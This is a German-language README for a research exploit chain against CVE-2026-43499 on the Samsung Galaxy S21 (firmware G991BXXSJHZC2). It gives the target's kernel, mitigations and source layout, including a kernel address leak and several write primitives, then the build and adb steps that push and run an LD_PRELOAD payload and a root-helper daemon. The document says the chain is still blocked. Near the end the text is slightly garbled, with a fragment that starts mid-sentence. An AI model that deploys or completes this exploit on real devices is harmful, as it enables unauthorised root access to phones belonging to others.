
Exploit-Chain-Forschung zu CVE-2026-43499 auf Samsung Galaxy S21
Gerätespezifische IonStack-Nutzlast für das Samsung Galaxy S21 (o1s) auf
Firmware G991BXXSJHZC2. Ermöglicht flüchtigen Root-Zugriff über einen LD_PRELOAD-Exploit +
call_usermodehelper-Root-Helper-Daemon (gleiche Form wie IonStack-S22U /
IONSTACK-S22). Status: Forschung — blockiert, siehe RESEARCH.md.
| Feld | Wert |
|---|---|
| Modell | SM-G991B |
| Gerät | o1s |
| Firmware | G991BXXSJHZC2 |
| Android | 12 / API 31 (AP3A.240905.015.A2, Fingerprint samsung/o1sxeea/o1s) |
| Seitengröße | 4096 |
| Kernel | 5.4.242-30958140-abG991BXXSJHZC2 |
| SoC | Exynos 2100 |
| Mitigations | CFI+PAC+PAN/UAO, KDP_CRED, SELinux enforcing, kein userfaultfd |
Basiert auf der IonStack-CVE-2026-43499-Implementierung, veröffentlicht in
NebuSec/CyberMeowfia (Upstream b850d3bddc74c3328d5fbcc0568d21962b55d949)
und BuSung-dev/CVE-2026-43499-S25U, mit Dank an F-19-F/IonStackQuest3.
Die Upstream-Apache-Lizenz 2.0 ist in LICENSE beibehalten (siehe NOTICE).
Makefile build (NDK r27+, ANDROID_NDK_HOME)
src/ exploit source (o1s profile only)
src/targets/o1s-G991BXXSJHZC2/ target.h + p0_fingerprint.h
src/kernelsnitch/ mm_struct leak (futex hash collision)
tools/ p0 fingerprint helper
RESEARCH.md research notes (geometry, verdicts)
export ANDROID_NDK_HOME=/path/to/android-ndk
make clean all
# SLIDE_WRITER_SEL=1|2|3 selects mcast/sigreturn(default)/xattr writers.
# Unset selects the experimental pselect writer (see RESEARCH.md).
Ausgaben (build/o1s-G991BXXSJHZC2/):
cve-2026-43499 (LD_PRELOAD-Nutzlast), cve-2026-43499-app.so (App-Nutzlast),
cve-2026-43499-root (Root-Helper).
adb push build/o1s-G991BXXSJHZC2/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/o1s-G991BXXSJHZC2/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 sh"
# on success:
/adb shell "/data/local/tmp/cve-2026-43499-root -c 'id; getenforce'"
Root (falls erreicht) besteht nur bis zum Neustart; es wird nichts geflasht.
sched_setattr → rt_mutex_adjust_prio_chain → _raw_spin_trylock NULL-Fehler), ohne jemals
den Stamp zu platzieren: Das 8-Byte-lock-Feld liegt in einer Copy-Lücke, die kein untersuchter
blockierender Syscall abdeckt (disasm-verifizierte Pro-Syscall-Tiefenkarte in
RESEARCH.md). Das Pipe-Reclaim-Gate verfehlt systematisch (0/0)./data/local/tmp wird beim Neustart gelöscht — Binärdateien
nach jedem Boot erneut pushen.